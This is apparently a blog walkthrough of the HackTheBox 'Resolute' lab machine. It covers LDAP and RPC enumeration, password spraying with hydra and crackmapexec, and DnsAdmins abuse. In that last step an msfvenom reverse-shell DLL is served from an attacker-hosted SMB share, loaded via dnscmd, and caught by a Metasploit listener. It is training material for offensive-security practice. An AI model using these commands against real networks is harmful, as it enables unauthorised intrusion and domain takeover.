Where Notes Work
RESOLUTE – HACKTHEBOX
This is the Write-up/Walkthrough of the RESOLUTE Machine from Hackthebox.
NMAP SCAN:
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-09 13:09:28Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ackDomain found: megabank.local, BIOS Name: Resolute
No file shares were found on smb, after I used ldapsearch to find more info about the domain, redirected the output to the file, and extracted all users.
ldapsearch -H ldap://10.10.10.169 -D '' -w '' -b "DC=megabank,DC=local" > ldap_search
cat ldap_search | grep sAMAccountName | awk '{print $2}' > users.txt
#remove extra groups name first wordafter that used rpcclient, to enumerate more about the domain and by querying “querydispinfo”, found a password set for marko account, “Welcome123!”, then will use this password to brute the users account that I found.
rpcclient -U "" -N 10.10.10.169
pcclient $> querydispinfo
after that used, hydra to brute-force the users with that password, and found a valid password of smb for Melanie user.
hydra -L users.txt -p 'Welcome123!' smb://10.10.10.169
And, username and password of winrm service is also the same, I brute-forced it using crackmapexec
crackmapexec winrm 10.10.10.169 -u users.txt -p 'Welcome123!'
Login to using evil-winrm and got the user flag.
after enumerating find the hidden directory in C:\ named PSTransscripts, going deeper into this directory found a file that contains PowerShell Transcript, reading the file and found the password of Ryan user.
after connecting to ryan user using evil-winrm, found that the group is in the Contractors group and this group is a member of DnsAdmins, looking for DnsAdmins abuse on the Internet found a way, from which I can inject a vulnerable payload using dnscmd and stop and start the service to get the reverse shell.
Ryan is a member of Contractors’ group
and Checking for localgroup members, found there is a DnsAdmins group, checking for its member, found that the Contractors group is a member of this group, and ryan is in this group.
I followed this blog to get the Administrator account/DA, read the blog for more info.
I will show two methods for getting an Administrator account, first one is getting the shell directory, and second one is modifying the user account or changing the administrator password directory.
Note: In a real-world environment, it is not suggested to change the credentials of any users.
Method 1:
Generating malicious dll using msfvenom to get the reverse shell.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.48 LPORT=1337 -f dll -o h311.dllafter that, open smbserver where generate dll is present, using impacket.
impacket-smbserver smb2support share .On ryan machine, using dnscmd to load generated malicious dll
dnscmd /config /serverlevelplugindll \\YOUR-TUNNEL-IP\share\h311.dllStart Metasploit listener:
msfconsole -q
msf6> use multi/handler
msf6> set payload windows/x64/meterpreter/reverse_tcp
msf6> set lhost tun0
msf6> set lport 1337
msf6> run
#now wait for the connection after that stop the dns service and start again, make sure to you started the Metasploit listener.
sc.exe stop dns
sc.exe start dns
Method 2:
Generating payload with msfvenom but assigning the command in it directly:
msfvenom -p windows/x64/exec cmd='net localgroup Administrators ryan /add /domain' -f dll -o h311_add.dllafter that, open smbserver where generate dll is present, using impacket.
impacket-smbserver smb2support share .On ryan machine, using dnscmd to load generated malicious dll
dnscmd /config /serverlevelplugindll \\YOUR-TUNNEL-IP\share\h311.dllafter that stop the dns service and start again, make sure you started the metasploit listener.
sc.exe stop dns
sc.exe start dnsnow, I can check, ryan is on the Administrators group.
but, in this lab, there is note.txt in ryan Desktop, saying any changes to the administrator account reverted back within 1 minute, there are also many methods to get an administrator account using these methods, try some methods on your own.
If you face any problems, let me know in the comment.